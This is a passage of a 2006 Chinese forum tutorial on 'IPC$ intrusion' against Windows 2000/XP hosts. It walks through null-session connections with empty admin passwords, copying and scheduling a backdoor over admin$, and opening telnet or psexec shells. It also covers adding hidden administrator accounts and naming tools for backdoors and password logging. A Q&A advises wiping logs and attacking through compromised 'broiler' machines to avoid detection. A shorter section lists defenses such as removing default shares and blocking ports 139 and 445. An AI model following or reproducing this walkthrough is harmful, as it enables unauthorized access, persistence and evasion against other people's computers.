2）得到本地主机的用户列表 net user 3）显示本地某用户的帐户信息 net user 帐户名 4）显示本地主机当前启动的服务 net start 5）启动/关闭本地服务 net start 服务名 net stop 服务名 6）在本地添加帐户 net user 帐户名密码 /add 7）激活禁用的用户 net uesr 帐户名 /active:yes 8）加入管理员组 net localgroup administrators 帐户名 /add 很显然的是，虽然这些都是本地命令，但如果你在远程主机的shell中输入，比如你telnet成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。 4 其他一些命令 1）telnet telnet IP 端口 telnet 127.0.0.0 23 2）用opentelnet.exe开启远程主机的telnet OpenTelnet.exe \\ip 管理员帐号密码 NTLM的认证方式 port OpenTelnet.exe \\127.0.0.1 administrator "" 1 90 不过这个小工具需要满足四个要求： 1）目标开启了ipc$共享 2）你要拥有管理员密码和帐号 3）目标开启RemoteRegistry服务，用户就可以更改ntlm认证 4）对仅WIN2K/XP有效 3）用psexec.exe一步获得shell，需要ipc管道支持 psexec.exe \\IP -u 管理员帐号 -p 密码 cmd psexec.exe \\127.0.0.1 -u administrator -p "" cmd 十三对比过去和现今的ipc$入侵 既然是对比，那么我就先把过去的ipc$入侵步骤写给大家，都是蛮经典的步骤： C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators \\用扫到的空口令建立连接　　 c:\>net view \\127.0.0.1 \\查看远程的共享资源 C:\>copy srv.exe \\127.0.0.1\admin$\system32 \\将一次性后门srv.exe复制到对方的系统文件夹下，前提是admin$开启　　 C:\>net time \\127.0.0.1 \\查看远程主机的当前时间 C:\>at \\127.0.0.1 时间 srv.exe \\用at命令远程运行srv.exe，需要对方开启了'Task Scheduler'服务　　 C:\>net time \\127.0.0.1 \\再次查看当前时间来估算srv.exe是否已经运行，此步可以省略 　　　　 C:\>telnet 127.0.0.1 99 \\开一个新窗口，用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思？那你就把它想象成远程机器的控制权就好了，操作像DOS)，99端口是srv.exe开的一次性后门的端口　　 C:\WINNT\system32>net start telnet \\我们在刚刚登陆上的shell中启动远程机器的telnet服务，毕竟srv.exe是一次性的后门，我们需要一个长久的后门便于以后访问，如果对方的telnet已经启动，此步可省略 C:\>copy ntlm.exe \\127.0.0.1\admin$\system32 \\在原来那个窗口中将ntlm.exe传过去，ntlm.exe是用来更改telnet身份验证的　　 C:\WINNT\system32>ntlm.exe \\在shell窗口中运行ntlm.exe，以后你就可以畅通无阻的telnet这台主机了 　　 C:\>telnet 127.0.0.1 23 \\在新窗口中telnet到127.0.0.1，端口23可省略，这样我们又获得一个长期的后门 C:\WINNT\system32>net user 帐户名密码 /add C:\WINNT\system32>net uesr guest /active:yes C:\WINNT\system32>net localgroup administrators 帐户名 /add \\telnet上以后，你可以建立新帐户，激活guest，把任何帐户加入管理员组等 好了，写到这里我似乎回到了2，3年前，那时的ipc$大家都是这么用的，不过随着新工具的出现，上面提到的一些工具和命令现在已经不常用到了，那就让我们看看现在的高效而简单的ipc$入侵吧。 psexec.exe \\IP -u 管理员帐号 -p 密码 cmd \\用这个工具我们可以一步到位的获得shell OpenTelnet.exe \\server 管理员帐号密码 NTLM的认证方式 port \\用它可以方便的更改telnet的验证方式和端口，方便我们登陆 已经没有第二步了，用一步获得shell之后，你做什么都可以了，安后门可以用winshell，克隆就用ca吧，开终端用3389.vbe，记录密码用win2kpass，总之好的工具不少，随你选了，我就不多说了。 十四如何防范ipc$入侵察看本地共享资源 运行-cmd-输入net share 删除共享(每次输入一个） net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete（如果有e,f,……可以继续删除） 1 禁止空连接进行枚举(此操作并不能阻止空连接的建立) 运行regedit，找到如下主键把RestrictAnonymous = DWORD的键值改为：1 如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但无法通过这种连接得到列举SAM帐号和共享信息的权限；在Windows 2000 中增加了"2"，未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项：在本地安全设置－本地策略－安全选项－'对匿名连接的额外限制' 2 禁止默认共享 1）察看本地共享资源 运行-cmd-输入net share 2）删除共享（重起后默认共享仍然存在） net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete（如果有e,f,……可以继续删除） 3）停止server服务 net stop server /y （重新启动后server服务会重新开启） 4）禁止自动打开默认共享（此操作并不能关闭ipc$共享） 运行-regedit server版:找到如下主键把AutoShareServer（DWORD）的键值改为:00000000。 pro版:找到如下主键把AutoShareWks（DWORD）的键值改为:00000000。 这两个键值在默认情况下在主机上是不存在的，需要自己手动添加，修改后重起机器使设置生效。 3 关闭ipc$和默认共享依赖的服务:server服务 如果你真的想关闭ipc$共享，那就禁止server服务吧： 控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用，这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于server服务，不要管它。 4 屏蔽139，445端口 由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。 1）139端口可以通过禁止NBT来屏蔽 本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项 2）445端口可以通过修改注册表来屏蔽 添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: System\Controlset\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 0 修改完后重启机器 注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。 3）安装防火墙进行端口过滤 6 设置复杂密码，防止通过ipc$穷举出密码，我觉得这才是最好的办法，增强安全意识，比不停的打补丁要安全的多。 十五 ipc$入侵问答精选 1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？ 答：留下记录是一定的，你走后用清除日志程序删除就可以了，或者用肉鸡入侵。 2.你看下面的情况是为什么，可以连接但不能复制 net use \\***.***.***.***\ipc$ "密码" /user:"用户名" 命令成功 copy icmd.exe \\***.***.***.***\admin$ 找不到网络路径 命令不成功 答：像“找不到网络路径”“找不到网络名”之类的问题，大多是因为你想要复制到的共享文件夹没有开启，所以在复制的时候会出现错误，你可以试着找找其他的共享文件夹。 3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？ 答：建议先用流光或者别的什么扫描软件试着猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。 4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？ 答：首先纠正你的一个错误，用net view \\ip是无法看到默认共享的，你可以试着将文件复制到c$，d$看看，如果都不行，说明他关闭了默认共享，那你就用opentelnet.exe或psexec.exe吧，用法上面有。 5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？ net uset ccbirds /add 答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell，只有在获得一个shell（比如telnet）之后，你才能在远程机器建立一个帐户，否则你的操作只是在本地进行。 6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？ 答：一般来说“拒绝访问”都是权限不够的结果，可能是你用的帐户有问题，还有一种可能，如果你想向普通共享文件夹复制文件却返回这个错误，说明这个文件夹设置的允许访问用户中不包括你（哪怕你是管理员），这一点我在上一期文章中分析了。 7.我用Win98能与对方建立ipc$连接吗？ 答：理论上不可以，要进行ipc$的操作，建议用win2000，用其他操作系统会带来许多不必要的麻烦。 8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？ 答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；还有可能是你自己的NBT没有打开，netstat命令是建立在NBT之上的。　　 9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？ 答：呵呵，这说明你已经与目标主机建立了ipc$连接，两个主机间同时建立两个ipc$连接是不允许的。 10.我在映射的时候出现： F:\>net use h: \\211.161.134.*\e$ 系统发生 85 错误。 本地设备名已在使用中。这是怎么回事？ 答：你也太粗心了吧，这说明你有一个h盘了，映射到没有的盘符吧！ 11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？ F:\>net use h: \\*.*.*.*\c$ 密码在 \\*.*.*.*\c$ 无效。 请键入 \\*.*.*.*\c$ 的密码: 系统发生 5 错误。 拒绝访问。 答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。 12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？ 答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享. 13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？ 答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。 14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c 出现请键入 \\192.168.0.2 的密码，怎么回事情呢？我用的可是管理员呀？应该什么都可以访问呀？ 答：虽然你具有管理员权限，但管理员在设置c盘共享权限时（注意：普通共享可以设置访问权限，而默认共享则不能）可能并未设置允许administrator访问，所以会出现上述问题。 15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器？如果禁止server服务呢？ 答：禁止以上两项仍可以发起ipc$连接，不过这种问题自己动手试验会更好。 16.能告诉我下面的两个错误产生的原因吗？ c:\>net time \\61.225.*.* 系统发生 5 错误。 拒绝访问。 c:\>net view \\61.225.*.* 系统发生 5 错误。 拒绝访问。 答：起初遇到这个问题的时候我也很纳闷，错误5表示权限不够，可是连空会话的权限都可以完成上面的两个命令，他为什么不行呢？难道是他没建立连接？后来那个粗心的同志告诉我的确是这样，他忘记了自己已经删了ipc$连接，之后他又输入了上面那两个命令，随之发生了错误5。 17.您看看这是怎么回事？ F:\>net time 找不到时间服务器。 请键入 NET HELPMSG 3912 以获得更多的帮助。 答：答案很简单，你的命令错了，应该是net time \\ip 没输入ip地址，当然找不到服务器。view的命令也应该有ip地址，即：net view \\ip<o:p></o:p>

fuluo 发表于 2006-5-17 06:28:48

Re:入侵基本功(IPC$基础)

高手

页: [1]

弱电论坛's Archiver

入侵基本功(IPC$基础)

Re:入侵基本功(IPC$基础)